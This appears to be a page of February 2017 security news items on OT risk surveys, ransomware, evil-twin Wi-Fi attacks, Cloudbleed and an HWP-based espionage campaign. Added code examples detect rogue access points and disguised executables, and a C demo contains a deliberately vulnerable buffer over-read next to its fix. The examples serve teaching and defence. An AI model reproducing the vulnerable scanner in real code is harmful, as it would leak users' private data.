Of the 377 individuals who took part in a survey conducted by the Ponemon Institute, more than two-thirds admitted having to deal with at least one incident in the past year that resulted in OT disruption or loss of confidential information. Furthermore, there are concerns that some attacks may have gone undetected.

Interestingly, one in five respondents admitted that their organization had been targeted in attacks involving sophisticated pieces of malware such as Duqu and Flame.

Many believe their organization is at a low to medium level when it comes to OT cybersecurity readiness, and only 35 percent believe they are properly prepared, the report shows.

Well over half of respondents believe the risk is greater in OT than in IT environments, and 67 percent believe cyber threats have had a significant impact on the risk to industrial control systems (ICS). When comparing IT to OT, only one-third of respondents said cybersecurity operations covering these areas are fully aligned.

Sixty-nine percent of those who took part in the study are concerned about the risks associated with third-parties in the supply chain, and many said they had difficulties in mitigating risks across the oil and gas value chain.

A majority of the security experts working in the U.S. oil and gas industry are most concerned about negligent and malicious or criminal insiders. The type of information that is considered the most at risk includes exploratory information (72%), production information (60%), potential partners and acquisition targets (56%), financial reports (53%), and operational information (50%).

Only 41 percent said their organization continually monitors the OT infrastructure, but fewer are actually capable of assessing risks, identifying the source of an attack, or remediating an incident. More than half of respondents said they outsource or would consider outsourcing OT security operations.

When asked about the factors that pose a risk to their organization, roughly 60 percent of respondents named either outdated and aging control systems, or IT products that are known to be vulnerable used in production environments.


Experts sound the alarm: ransomware attacks are becoming more frequent

24.2.2017 Novinky/Bezpečnost Viruses
Security experts have recorded a dramatic rise in attacks by extortion viruses, collectively known as ransomware. According to a current report from the antivirus company Check Point, their share among individual threats doubled in the second half of last year. And it is going to get worse…
What is ransomware? One in three people does not know

Extortion viruses, often referred to collectively as ransomware, have been among the most serious threats for the past several months. Even so, one in three people does not know what the word ransomware actually means, nor, therefore, that it refers to a piece of malicious software. This follows from a survey by the antivirus company Eset.
The survey was conducted in the USA and Canada with more than three thousand participants in total. A third of them answered that they had no idea what the word ransomware means.
Security experts explained to them that these are malicious programs that lock the computer, encrypt all the stored data and demand a ransom to make it accessible again. Eighty-five percent of respondents said they would not be willing to pay; they would rather lose the hijacked data.
How people protect their data is also interesting. A full 31% of respondents said they do not back up the files stored on their computer in any way, not even photos or videos. In the event of a ransomware attack they would lose their data for good.
"Thousands of new ransomware variants were detected in 2016, and in recent months we have witnessed another change. Ransomware is becoming more and more centralized, with a few major malware families dominating the entire market and attacking organizations of all sizes," noted Petr Kadrmas, security expert at Check Point.

According to him, attacks on end users are naturally nothing unusual either. Cyber criminals nevertheless target businesses and corporate networks even more often, because that is where they can do far more damage.

The reason cyber criminals spread ransomware so often is simple. "Ransomware simply works and generates profits for attackers. Organizations try to protect themselves effectively, but many do not use the right security and underestimate the training of employees, who could prevent costly damage by recognizing the signs of an attack," Kadrmas noted.

Everything therefore suggests that extortion viruses will spread even more this year than last.

Attacks are more sophisticated
It is also worth recalling that cyber criminals are becoming ever more inventive in spreading such uninvited guests. Often even experienced users may fail to detect an attack.

One of the newest tricks is displaying web pages full of nonsensical characters, similar to what text documents show when the font they use is not installed on the computer. In practice the user then has to install the character set manually to be able to read the text.

And that is exactly what the cyber criminals are counting on. "The user is shown a prompt to install a font package for Google Chrome, with the claim that this will fix the problem," said Pavel Bašta, security analyst at CSIRT.CZ.

"If the user falls for the trick, their problems are only beginning, because instead of fonts they install a Trojan horse or even ransomware on their computer," the security analyst added, noting that users may encounter similar attacks even on legitimate websites that cyber criminals manage to compromise.

Do not pay the ransom
Attacks by extortion viruses always follow exactly the same pattern. First the malware encrypts all the data stored on the hard disk. The attackers then demand a ransom to make it accessible again, easily several thousand crowns.

Cyber criminals usually try to give the owner of the infected machine the impression that they will get their files back once they pay the "fine".

It is worth repeating that people should not pay the ransom, because they have no guarantee that the data will actually be made accessible. Similar cases from the past even suggest that the data is practically never decrypted. The only solution is to clean the malware off the computer, which may not be easy.


The most bizarre Android virus? A fake Avast wrapped in a fake PornHub, which will cost you 100 dollars
24.2.2017 Novinky/Bezpečnost Viruses
There is one thing you cannot deny the authors of Android ransomware
They have a twisted sense of humor
They impersonate Avast, the FBI or even the NSA
There is one thing you cannot deny the authors of ransomware, the dangerous malware that encrypts data and demands a ransom: a sense of humor, albeit a somewhat twisted one. At least that is what emerges from the security study Trends in Android Ransomware (PDF), prepared by analysts at Eset and devoted this time to the extortion viruses that have spread, and in many cases continue to spread, through the Android world.

To give the ransomware time to encrypt at least the shared storage on the phone (the SD card, shared internal storage and so on), it often poses as a fairly legitimate program. And by the time anyone notices something suspicious, it may already be too late.

Some of the specimens Eset caught, however, really deserve attention. One of them is a fake antivirus designated Android/FakeAV.E. That in itself is nothing unusual, since plenty of malware started spreading in this guise on the classic desktop too: a seemingly trustworthy application that you launched voluntarily then pulled further malware onto the computer or started encrypting its hard drive.

A fake Avast wrapped in a fake PornHub

One such mobile antivirus is a little different, though, because it is wrapped in yet another fictitious application: PornHub. The portal for fans of independent cinema probably needs no lengthy introduction. And why did the attackers choose it? Not only for its fame, but above all because the Play Store does not allow the publication of pornographic apps, so even PornHub distributes its app on its own as an APK package that you have to install manually. It therefore does not pass through Google's antivirus checks, and at the same time the ordinary user enables installation of apps from alternative sources, which other viruses can exploit.

The real and the fake PornHub with Avast

In any case, as soon as you launch the app, it shows the basic PornHub screen, but immediately afterwards also a prompt to scan for viruses. And then it all happens in quick succession. The fake Avast antivirus, as instructed by its author, of course prints a long list of malware it has supposedly found, while in reality it is the one that has infected the storage, after which it shows a cheeky dialog saying that for security reasons it has blocked everything and you must buy the Pro version, that is, pay a ransom of 100 dollars... in bitcoin.

Fake police, FBI and NSA

Another interesting camouflage used by more than one ransomware family is law enforcement, especially the police. The police command respect everywhere in the world, so everyone gets scared and prefers to pay. Some fraudulent apps that encrypt data and demand a ransom therefore bet on displaying, after launch, a dialog saying they have found some illegal content on the phone, typically warez, and that under section XYZ you face a fine and imprisonment, which you can avoid only by paying a small administrative fee... in bitcoin.

The fake Russian police even take your picture, while the FBI and NSA get straight to the point and want the fine paid, otherwise you will be extradited to the USA

Protection against this kind of junk on a phone has been the same for years and is actually quite simple. First of all, use common sense and install only apps with good ratings; despite all Google's efforts, even its Play Store is not entirely safe, and from time to time something does slip through its antivirus checks.


Hacker Shows How Easy It Is To Hack People While Walking Around in Public
24.2.2017 thehackernews Hacking

Wi-Fi enabled devices — widely known as the Internet of Things (IoT) — are populating offices and homes in greater and greater numbers.
From smartphones to connected printers and even coffee makers, most of these IoT devices have good intentions and can connect to your company's network without a problem.
However, as Internet of Things (IoT) devices multiply at a great pace, they widen the attack surface at the same time, giving attackers a large number of entry points to reach you in one way or another.
Attackers can use your smart devices to gain backdoor entry to your network, giving them the ability to steal sensitive data, such as your personal information, and to carry out a multitude of other malicious acts.
An interesting attack scenario has recently been demonstrated by the well-known hacker Jayson Street, who says all it takes is to walk around with the right device to get into someone's devices.
Before we jump into the technical details of the attack, let's watch a video showing how easy it is to hack smartphones and laptops in a crowded place by setting up an EvilAP (malicious access point).
Here's How the Attack Works:
Street used a simple penetration testing device and an internet connection to pwn the people around him.
Technically, Street's hacking device automatically set up an 'Evil Twin Attack,' in which an attacker fools wireless users into connecting their smartphones and laptops to an evil (malicious) hotspot by posing as a legitimate WiFi provider.
Once connected, all of the victim's traffic flows through the attacker's device, allowing cybercriminals to secretly eavesdrop on the network traffic, steal passwords, financial and other sensitive data, and even redirect the victim to malware and phishing sites.
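An evil twin is visible on the air before anyone connects to it: a second access point advertising an SSID you manage, usually with a stronger signal and often without the encryption the real network uses. The following added example (not Street's tooling and not Pwnie Express code) runs that check over a constructed scan result; the CSV layout, the BSSIDs and the AUTHORIZED inventory are all assumptions made for the example.

```python
import csv
import io

# Constructed scan output in a simple CSV form (not the article's data and not
# output of any Pwnie Express tool): one row per access point heard on the air.
SCAN_CSV = """bssid,ssid,channel,security,signal_dbm
00:11:22:aa:bb:01,CorpWiFi,6,WPA2-PSK,-48
00:11:22:aa:bb:02,CorpWiFi,11,WPA2-PSK,-55
de:ad:be:ef:00:01,CorpWiFi,6,OPEN,-35
de:ad:be:ef:00:02,CorpWiFi,1,WPA2-PSK,-40
3c:4d:5e:00:00:01,attwifi,1,OPEN,-70
"""

# Assumed site inventory: which BSSIDs may advertise each managed SSID and
# which security the real network uses.
AUTHORIZED = {
    "CorpWiFi": {
        "bssids": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"},
        "security": "WPA2-PSK",
    },
}


def parse_scan(text):
    """Turn the CSV text into a list of dicts with typed numeric fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["bssid"] = row["bssid"].lower()
        row["channel"] = int(row["channel"])
        row["signal_dbm"] = int(row["signal_dbm"])
        rows.append(row)
    return rows


def find_evil_twins(records, inventory):
    """Flag access points that advertise a managed SSID but are not ours.

    Two signs of an evil twin: a BSSID that is not in the inventory for that
    SSID, and a security setting that differs from the real network (typically
    an OPEN clone of a WPA2 SSID). Findings are sorted strongest first, because
    a rogue AP wins clients by out-powering the genuine one.
    """
    findings = []
    for r in records:
        policy = inventory.get(r["ssid"])
        if policy is None:
            continue  # not a network we manage; nothing to compare against
        reasons = []
        if r["bssid"] not in policy["bssids"]:
            reasons.append("unknown BSSID advertising a managed SSID")
        if r["security"] != policy["security"]:
            reasons.append(
                f"security {r['security']} differs from expected {policy['security']}"
            )
        if reasons:
            findings.append({**r, "reasons": reasons})
    return sorted(findings, key=lambda f: f["signal_dbm"], reverse=True)


if __name__ == "__main__":
    for f in find_evil_twins(parse_scan(SCAN_CSV), AUTHORIZED):
        print(f"{f['bssid']} ch{f['channel']} {f['signal_dbm']} dBm: " + "; ".join(f["reasons"]))
```

The second rogue entry (de:ad:be:ef:00:02) clones both the SSID and the WPA2 setting, so the security mismatch rule alone would miss it; only the BSSID inventory catches it. That is why a maintained list of your own access points, not just an SSID list, is the useful input for this kind of monitoring.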
How to Prevent Evil Twin WiFi Attacks
Pwnie Express has released its yearly industry report, Internet of Evil Things, providing insight into the products IT professionals should be wary of.
Using the report and additional information from security researchers at Pwnie, we have listed five quick steps you can implement to prevent yourself or your workplace from being compromised.
1. Turn your WiFi Off: Turn off Wi-Fi devices when you are not using them, especially on the weekends — it saves energy and minimizes your exposure to hackers.
2. Use it or Lose it: Once the product is in your office, turn off the functions you aren't using. Enabled functionality usually comes with increased security risks.
Also, make sure you review the products before you bring them into the workplace. If it is already there, do not be shy about calling customer service and walking through the steps required to shut down any unused functions.
3. Change Your Passwords: It is important never to use the default credentials. Set up strong, secure passwords to secure your devices.
4. Research Your Purchase: Before you even buy a product, always research what you're buying and make sure you know how to update any software associated with that device.
Look for devices, systems, and services that make it easy to upgrade the device and inform the end user when updates are available.
5. Trust and Verify Every Device: Be aware of any device from brands known to have more security issues than others. The personalization of corporate hardware, including mobile hotspot vendors, is one of the top threats to network security.


Serious Bug Exposes Sensitive Data From Millions Sites Sitting Behind CloudFlare
24.2.2017 thehackernews Vulnerebility

A severe security vulnerability has been discovered in the CloudFlare content delivery network that has caused big-name websites to expose private session keys and other sensitive data.
CloudFlare, a content delivery network (CDN) and web security provider that helps optimize the safety and performance of over 5.5 million websites on the Internet, is warning its customers of a critical bug that could have exposed a range of sensitive information, including passwords, cookies and the tokens used to authenticate users.
Dubbed Cloudbleed, the nasty flaw is named after the Heartbleed bug discovered in 2014, but it is believed to be worse than Heartbleed.
The vulnerability is so severe that it not only affects websites on the CloudFlare network but affects mobile apps as well.
What exactly is "Cloudbleed," how it works, how are you affected by this bug, and how you can protect yourself? Let's figure it out.
What is Cloudbleed?
Discovered by Google Project Zero security researcher Tavis Ormandy over a week ago, Cloudbleed is a major flaw in the Cloudflare Internet infrastructure service that causes the leakage of private session keys and other sensitive information across websites hosted behind Cloudflare.
CloudFlare acts as a reverse proxy between users and web servers: it caches content for the websites that sit behind its global network and lowers the number of requests reaching the origin server, passing content through Cloudflare's edge servers for optimization and security.
Almost a week ago, Ormandy discovered a buffer over-read in Cloudflare's edge servers: they were running past the end of a buffer and returning memory containing private data such as HTTP cookies, authentication tokens and HTTP POST bodies, some of which had already been cached by search engines.
Here's How Serious is Cloudbleed:

"I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings," Ormandy wrote in a blog post that was also published Thursday. "We're talking full HTTPS requests, client IP addresses, full responses, cookies, passwords, keys, data, everything."
According to Ormandy, Cloudflare had code in its "ScrapeShield" feature that did something similar to this:
int Length = ObfuscateEmailAddressesInHtml(&OutputBuffer, CachedPage);
write(fd, OutputBuffer, Length);
But the company was not checking whether the obfuscation parser returned a negative value when fed malicious HTML.
Cloudflare's "ScrapeShield" feature parses and obfuscates HTML, and since the reverse proxies are shared among customers, memory leaked this way could belong to any CloudFlare customer.
Ormandy, who had observed encryption keys, passwords, cookies, chunks of POST data and HTTPS requests belonging to other Cloudflare-hosted websites and other users, contacted Cloudflare and reported his findings. The company identified the cause of the issue and immediately disabled three minor Cloudflare features, Email Obfuscation, Server-side Excludes and Automatic HTTPS Rewrites, that were using the same HTML parser chain responsible for the leakage.
Because CloudFlare had patched the issue but had not notified customers of the data leak by Wednesday, Ormandy published his findings on Thursday, following Project Zero's seven-day disclosure policy for actively exploited vulnerabilities.
Following Ormandy's public disclosure of the vulnerability on Thursday, CloudFlare confirmed the flaw, ensuring its customers that their SSL private keys were not leaked.
"Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug," Cloudflare CTO John Graham-Cumming wrote in a blog post. "The bug was serious because the leaked memory could contain private information and because it had been cached by search engines."
"We are disclosing this problem now as we are satisfied that search engine caches have now been cleared of sensitive information," he added. "We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence."
The Root Cause of Cloudbleed:
The root cause of the Cloudbleed vulnerability was that "reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer."
"Had the check been done using >= instead of == jumping over the buffer end would have been caught," said Graham-Cumming.
Cloudflare has also confirmed that the greatest period of impact was between February 13 and February 18 with almost one in every 3,300,000 HTTP requests via Cloudflare potentially resulting in memory leakage, which is about 0.00003% of requests.
However, the researcher argued that the company was downplaying the problem, pointing out that, judging by Google's cached data, the Cloudbleed vulnerability had existed for months.
How Does Cloudbleed Affect You?
Many Cloudflare services parse HTML pages and modify them on Cloudflare's edge servers.
Even if you do not use CloudFlare directly, that does not mean that you are spared. There is always a chance that websites you visit and web services you use may have been affected, leaking your data as well.
Of course, if you are using Cloudflare services in front of your site, the flaw could impact you, exposing sensitive information that flowed between your servers and end-users through CloudFlare's proxies.
While CloudFlare rapidly patched the bug and has said the actual impact is relatively minor, data had been leaking for months before the fix.
Some of this leaked data was publicly cached by search engines such as Google, Bing and Yahoo, which have now removed it, but some engines, such as DuckDuckGo, still hold copies.
Also, other leaked data might exist in other services and caches throughout the Web, which is impossible to delete across all of these locations.
Cloudbleed Also Affects Mobile Apps
Cloudbleed also affects mobile apps, because, in many cases, the apps are designed to make use of the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.
Users on Hacker News have confirmed the presence of HTTP header data for apps such as Discord, FitBit and Uber by searching DuckDuckGo's caches with targeted search terms.
In an analysis conducted by NowSecure, the researchers found some 200 iOS apps that use Cloudflare services in a sample of about 3,500 of the most popular apps on the App Store.
There is always a possibility that someone discovered this vulnerability before Tavis and had been actively exploiting it, although there is no evidence to support this theory.
Some of Cloudflare's major customers affected by the vulnerability include Uber, 1Password, FitBit and OKCupid. However, in a blog post, 1Password assured its users that no sensitive data was exposed, because the service applies its own encryption to data in transit on top of TLS.
A list of websites potentially impacted by this bug has been published on GitHub by a user going by the name 'pirate'; it includes Coinbase, 4Chan, BitPay, DigitalOcean, Medium, ProductHunt, Transferwise, The Pirate Bay, Extra Torrent, BitDefender, Pastebin, Zoho, Feedly, Ashley Madison, Bleeping Computer, The Register and many more.
Since CloudFlare does not yet provide the list of affected services, bear in mind that this is not a comprehensive list.
What should You do about the Cloudbleed bug?
Online users are strongly advised to reset their passwords for all accounts, especially if they have reused the same password across sites, and to monitor account activity closely while the cleanup is underway.
Moreover, customers who use Cloudflare in front of their websites are advised to force a password change for all of their users.
Update: An Uber representative reached out to me via email and said their investigation revealed that the Cloudbleed bug exposed no customer passwords. Here's the statement provided by Uber:
"Very little Uber traffic actually goes through Cloudflare, so only a handful of tokens were involved and have since been changed. Passwords were not exposed."


South Korea targeted by a cyber espionage campaign, experts blame Norks
24.2.2017 securityaffairs Cyber

South Korea is once again under attack: alleged nation-state hackers have launched a sophisticated cyber espionage campaign against organizations in the public sector.
According to experts at Cisco Talos, the cyber espionage campaign was active between November 2016 and January 2017 and leveraged weaponized documents for the Hangul Word Processor (HWP), a Korean-language word processing program, including a spoofed document from the Korean Ministry of Unification.


The cyber espionage campaign ran at the same time as the ballistic missile tests conducted by North Korea in early February and shortly before the announcement of a joint military exercise organized by the United States and South Korea.

Malware researchers who investigated the attacks discovered that the threat actors used a compromised Korean government website, kgls.or.kr (Korean Government Legal Service), to deliver secondary payloads onto compromised machines.

The downloaded file is a binary masquerading as a JPEG image file, which is then executed as part of the infection.
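An executable served under a .jpg name is cheap to spot on a proxy or in a sandbox because the content does not match the name: a JPEG starts with the bytes FF D8 FF, while a Windows executable starts with an MZ header whose e_lfanew field points at the "PE\0\0" signature. The check below is an added example, not Talos's code; every sample file is constructed inline, and the .hwp entry assumes the OLE compound-file container used by HWP 5.x documents (plus the ASCII signature of older HWP 3.x files).

```python
import struct

# Added example (not Talos's code). Files delivered as "images" are checked by
# content rather than by name. Every sample below is constructed; the .hwp
# entry assumes the OLE compound-file container used by HWP 5.x documents.


def make_fake_pe() -> bytes:
    """Constructed PE-shaped bytes: DOS header, e_lfanew = 0x80, PE signature."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)        # e_lfanew -> offset of "PE\0\0"
    # IMAGE_FILE_MACHINE_I386 followed by padding; headers are deliberately truncated
    return bytes(hdr) + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 58


def is_pe(data: bytes) -> bool:
    """An MZ stub alone is not enough; follow e_lfanew and require the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = struct.unpack_from("<I", data, 0x3C)[0]
    return data[off:off + 4] == b"PE\x00\x00"


def sniff(data: bytes) -> str:
    """Classify content by magic bytes, independent of the file name."""
    if is_pe(data):
        return "pe"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "cfb"        # OLE2 compound file (HWP 5.x container, also legacy Office)
    if data.startswith(b"HWP Document File"):
        return "hwp3"
    return "unknown"


# What each extension is allowed to contain.
EXPECTED = {"jpg": {"jpeg"}, "jpeg": {"jpeg"}, "hwp": {"cfb", "hwp3"}, "exe": {"pe"}, "dll": {"pe"}}


def assess(name: str, data: bytes) -> dict:
    """Compare the type claimed by the extension with the type found in the bytes."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    actual = sniff(data)
    expected = EXPECTED.get(ext)
    suspicious = expected is not None and actual not in expected
    return {"name": name, "claimed": ext, "actual": actual, "suspicious": suspicious}


SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16,   # JPEG/JFIF header
    "image.jpg": make_fake_pe(),                                          # executable named as an image
    "report.hwp": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24,  # compound-file container
    "update.jpg": b"MZ" + b"\x00" * 30,                                   # MZ prefix without a PE header: still not a JPEG
}


def scan_samples(samples=SAMPLES):
    """Names of samples whose content does not match their extension."""
    return [r["name"] for r in (assess(n, d) for n, d in samples.items()) if r["suspicious"]]


if __name__ == "__main__":
    for n, d in SAMPLES.items():
        print(assess(n, d))
```

The rule is deliberately one-directional: a file with an unknown extension is never flagged, but a .jpg that is not a JPEG always is, whatever it turns out to be. That keeps the check cheap enough to run on every download a proxy sees, with the classification of the oddities left to a sandbox.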

The experts noticed that the hackers used the proprietary format of the Hangul Word Processor, a word processor used mainly in Korea, a circumstance that suggests a well-funded group with a specific interest in South Korean targets, especially government offices.

The hackers used a bait document titled "Analysis of 'Northern New Year' in 2017", which carries the logo of the Ministry of Unification at the bottom of the page.

“This is a fairly unusual choice as this software is rarely used outside of Korea, but it is known to be widely used within Korea, including use by the South Korean government. As a regional file format, many security devices are not equipped to process HWP files. This can allow an attacker a vector with a much lower risk of detection by any security scanning devices.” reads the analysis shared by the Talos Group.

The documents were used to drop malware files with different hashes but the same purpose:

Open an HWP document (in response to the double click on the object embedded in the previous document)
Download a payload from a compromised host/C2.
The experts at Talos were able to identify the command and control infrastructure used by the hackers, four servers located in the following countries:

3 C2 in South Korea
1 C2 in the Netherlands
Investigators believe the attack was backed by North Korea; the TTPs (tactics, techniques and procedures) match the profile of campaigns previously associated with nation-state actors. North Korea is the main suspect, but in the past the US NSA also compromised computer networks in South Korea, primarily to spy on the government in Pyongyang.

North Korea has launched numerous cyber attacks against the South over the years; Dark Seoul, which targeted banks and broadcasters in 2013, is probably the best-known campaign.

Other past attacks have also leveraged flaws in the Hangul Word Processor: in September 2015, security experts at FireEye speculated that North Korea had carried out cyber attacks against South Korea by exploiting a zero-day (CVE-2015-6585) in the word processing program widely used in that country.

According to a report published by FireEye, the Hangul Word Processor is proprietary software used primarily by government and public institutions in South Korea, which is why North Korea allegedly chose it as the attack vector.

Back to the present: the Talos report is worth reading in full, and it also includes IoCs.


Cloudbleed flaw exposes sensitive data from millions sites behind CloudFlare
24.2.2017 securityaffairs Hacking

Cloudflare was leaking a wide range of sensitive information, including authentication cookies and login credentials. The flaw was dubbed Cloudbleed.
Google Project Zero researcher Tavis Ormandy recently made an astonishing discovery: Cloudflare's edge servers were returning memory containing other users' sensitive data, including authentication cookies and login credentials.

“On February 17th 2017, I was working on a corpus distillation project, when I encountered some data that didn’t match what I had been expecting. It’s not unusual to find garbage, corrupt data, mislabeled data or just crazy non-conforming data…but the format of the data this time was confusing enough that I spent some time trying to debug what had gone wrong, wondering if it was a bug in my code. In fact, the data was bizarre enough that some colleagues around the Project Zero office even got intrigued.” Ormandy wrote in a security advisory. “We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.”

Tavis Ormandy (@taviso) tweeted on 24 Feb 2017: “Cloudflare have been leaking customer HTTPS sessions for months. Uber, 1Password, FitBit, OKCupid, etc. https://bugs.chromium.org/p/project-zero/issues/detail?id=1139”
The Cloudbleed security issue in Cloudflare servers has a significant impact on numerous major organizations, including Uber, Fitbit, 1Password, and OKCupid. Cloudbleed also affects mobile apps, because they use the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.

“Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.” reads a blog post published by Cloudflare’s CTO, John Graham-Cumming.

“It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.”

Google has started removing cached copies of the leaked data; unfortunately, the same information is still stored on the servers of many other search engines, where it is accessible to everyone.

Cloudflare promptly responded to the incident by disabling the following features on its infrastructure, because they rely on the broken HTML parser chain that is the root cause of the issue:

Email obfuscation;
Server-side Excludes;
Automatic HTTPS Rewrites;
The root cause of Cloudbleed was that “reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer.” “Had the check been done using >= instead of == jumping over the buffer end would have been caught,” explained Graham-Cumming.
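The check Graham-Cumming describes, as an added illustration in C that is not Cloudflare's code: a toy scanner over a constructed buffer, with the `==`-style loop test beside the `>=`-style one. The backing array, the escape rule and the "SECRET-COOKIE" bytes that follow the input are all constructed for the demo; they stand in for whatever happened to sit after the buffer in the real process.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed memory layout for the demo: the 8-byte input "key=val\"
 * (a value cut off in the middle of an escape) is followed in memory by
 * unrelated data, standing in for another request's content. */
static const char backing[] = "key=val\\" "SECRET-COOKIE;";
static const size_t input_len = 8;

/* Copies a value up to ';' into out, treating '\' as an escape whose next
 * byte is literal.  Termination is tested with equality, as in the bug the
 * article describes: a trailing '\' moves p two bytes forward, lands one
 * past end, and the `p != end` test never fires again. */
size_t scan_vulnerable(const char *buf, size_t len, char *out, size_t cap)
{
    const char *p = buf, *end = buf + len;
    size_t n = 0;
    while (p != end) {                 /* BUG: only exact equality stops the loop */
        if (*p == ';') break;
        if (*p == '\\') p++;           /* step over the backslash to the literal */
        if (n + 1 < cap) out[n++] = *p;
        p++;                           /* after a trailing '\', p == end + 1 */
    }
    out[n] = '\0';
    return n;
}

/* Same scanner with the fix: the loop runs only while p < end (it stops as
 * soon as p >= end, even when p overshot), and an escape that would need a
 * byte beyond end is treated as truncated input. */
size_t scan_hardened(const char *buf, size_t len, char *out, size_t cap)
{
    const char *p = buf, *end = buf + len;
    size_t n = 0;
    while (p < end) {
        if (*p == ';') break;
        if (*p == '\\') {
            if (p + 1 >= end) break;   /* truncated escape: nothing to copy */
            p++;
        }
        if (n + 1 < cap) out[n++] = *p;
        p++;
    }
    out[n] = '\0';
    return n;
}

/* Runs either scanner over the constructed layout; cap must be > 0. */
size_t run_scan(int hardened, char *out, size_t cap)
{
    return hardened ? scan_hardened(backing, input_len, out, cap)
                    : scan_vulnerable(backing, input_len, out, cap);
}

/* 1 if the scanner's output contains bytes from beyond the input, else 0. */
int leaks_adjacent_memory(int hardened)
{
    char out[64];
    run_scan(hardened, out, sizeof out);
    return strstr(out, "SECRET") != NULL;
}

int main(void)
{
    char out[64];
    size_t n = run_scan(0, out, sizeof out);
    printf("== check: copied %zu bytes: \"%s\"\n", n, out);
    n = run_scan(1, out, sizeof out);
    printf(">= check: copied %zu bytes: \"%s\"\n", n, out);
    return 0;
}
```

The equality version copies the neighbouring bytes into its output, which is the shape of the leak: nothing crashes, the response is simply longer than the input and carries memory that belonged to something else. The `<` / `>=` form stops even when the pointer has overshot by more than one byte, which is why it is the right comparison for any loop whose step size can exceed one.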

The Cloudbleed issue dates back to September 22, 2016, when the problem began. The greatest period of impact was between February 13 and February 18, with roughly one in every 3,300,000 HTTP requests via Cloudflare potentially resulting in memory leakage (about 0.00003% of requests).

“The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence.” continues the post published by Cloudflare. “The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests).”

Curiously, Cloudflare pointed Ormandy to the company’s bug bounty programme, which offered the expert a t-shirt rather than financial compensation.

We cannot exclude that a threat actor who discovered the Cloudbleed flaw may have been actively exploiting it, but at the time of writing there is no evidence of such attacks.


New "Filecoder" macOS Ransomware Surfaces

24.2.2017 securityweek Virus

New Filecoder macOS Ransomware is Poorly Coded, Destructive

A newly discovered ransomware targeting macOS destroys encryption keys before sending them to its apparently inexperienced developer, ESET researchers have discovered.
Dubbed Filecoder (OSX/Filecoder.E) and written in Apple's Swift programming language, the threat is only the second ransomware family known to have ever hit macOS. The first fully functional such threat emerged in March last year as KeRanger, and was soon found to be a variant of the Linux ransomware known as Linux.Encoder.

Although file-encrypting ransomware targeting macOS is rare, it can be very damaging, and OSX/Filecoder.E proves it. The malware is distributed via BitTorrent sites, masquerading as an application for pirating popular software such as Adobe Premiere Pro and Microsoft Office for Mac, ESET’s Marc-Etienne M.Léveillé explains.

The application, which has the bundle identifier NULL.prova, hasn’t been signed with a certificate issued by Apple, making its installation more difficult on newer operating system versions, where default security settings would prevent it from running. What’s more, the malicious app’s window has a transparent background that makes it confusing, and can’t be opened once closed.

Once the user runs the malicious program, it first copies a README!.txt file into the user’s folders, then starts encrypting the files it finds on the machine. For that, it enumerates the user’s files with the find command line tool, then uses a randomly generated 25-character string to encrypt all of the discovered files by placing each of them in an encrypted archive.

The malware also deletes the original files with rm, and modifies the encrypted files’ time to midnight, February 13th 2010, using the touch command. After encrypting files in the /Users directory, the malware starts searching for mounted external and network storage under /Volumes and repeats the process for files on them as well.

As soon as the process has been completed, the ransomware is supposed to null all free space on the root partition with diskutil, but the operation fails because the developer didn’t use the correct path to the tool in the malware’s code, M.Léveillé notes. While Filecoder.E tries to execute /usr/bin/diskutil, the actual path to the tool in macOS is /usr/sbin/diskutil.

The dropped README!.txt file functions as a ransom note, providing victims with instructions on how to pay to recover their files. Apparently, the malware uses the same Bitcoin address and email address for every victim running the same sample. However, the security researchers noticed that no payment has been made so far, and say that no one has tried to contact the malware developer via the provided email address (a public inbox that can be accessed without registration or authentication).

The main issue with the ransomware, researchers say, is that it doesn’t attempt to connect to a command and control server to transmit the encryption key before destroying it, meaning that the malware author can’t decrypt users’ files even after receiving payment. Furthermore, the key is generated using a secure algorithm and is too long to be brute forced.

“This also means that there is no way for them to provide a way to decrypt a victim’s files. Paying the ransom in this case will not bring you back your files. That’s one of the reasons we advise that victims never pay the ransom when hit by ransomware. Alas, the random ZIP password is generated with arc4random_uniform which is considered a secure random number generator. The key is also too long to brute force in a reasonable amount of time,” M.Léveillé explains.

Although not a masterpiece, the new macOS-targeting crypto-ransomware is effective enough to prevent the victims from accessing their files, and researchers say it could cause serious damage. The malware also proves that users downloading pirated software are exposed to greater risks, especially when using dubious channels for acquiring software. Users are advised to download software only from official websites, to keep their software up to date at all times, and to install and maintain a security application on their machines.


Poison Ivy RAT Campaign Leverages New Delivery Techniques

24.2.2017 securityweek Virus

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

